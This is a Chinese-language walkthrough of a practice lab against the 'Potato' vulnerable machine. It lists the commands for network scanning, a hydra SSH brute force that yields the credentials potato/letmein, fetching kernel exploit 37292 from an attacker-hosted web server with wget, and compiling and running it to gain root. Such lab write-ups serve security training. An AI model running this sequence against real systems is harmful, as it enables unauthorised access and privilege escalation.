Potato靶机测试

一、设备扫描

nmap -sP 192.168.119.128/24        --------------扫描此网段存活的设备

发现目标靶机的ip可能为192.168.119.130

Potato靶机测试_第1张图片 

 


二、全面扫描靶机

nmap -A 192.168.119.130 -p- -oN nmap192.168.119.130

发现其开着80端口的HTTP服务和7120端口的SSH服务

Potato靶机测试_第2张图片 

 


 三、针对HTTP服务收集网站信息

发现隐藏目录/info.php

访问192.168.119.130/info.php发现只有php的版本信息,没有可以利用的注入点

所以放弃对HTTP服务的攻击,转为对SSH服务进行研究。

Potato靶机测试_第3张图片 

 

Potato靶机测试_第4张图片 

 


四、hydra爆破SSH

hydra 192.168.119.130 ssh -L username.txt -P password.txt -s 7120 -f

得到     账号:potato   密码:letmein

Potato靶机测试_第5张图片

五、使用ssh链接靶机

ssh [email protected] -p 7120

 Potato靶机测试_第6张图片

 


六、信息分析

登录后发现目录下并没有什么有用的东西

id查看发现是一个普通用户

uname -a查看发现ubuntu的版本很老,只有3.13.0

下一步针对ubuntu版本查找漏洞

Potato靶机测试_第7张图片 


七、 查找漏洞

serchsploit ubuntu 3.13.3

使用第一个漏洞进行攻击

 Potato靶机测试_第8张图片

八、使用漏洞 

现在已经得知靶机存在以下漏洞,下一步想法是将漏洞传到靶机上,这里我们在kali上建立apache服务器,让目标主机通过网络将漏洞下载到本机上

service apache2 start   ---------开启服务器

ss -tunlp                       ----------查看开启端口

 

 将漏洞下载到服务器目录下

cd /var/www/html

searchsploit -m 37292 

 Potato靶机测试_第9张图片

九、使用目标靶机下载服务器上的漏洞

wget http://192.168.119.128/37292.c 

Potato靶机测试_第10张图片 

十、运行脚本提权

gcc 37292.c -o exp ----------编译脚本

chmod +777 exp -----------更改权限

./exp -------------执行脚本

 Potato靶机测试_第11张图片

 成功拿到root权限,攻击成功!

你可能感兴趣的:(安全性测试,系统安全,安全,服务器)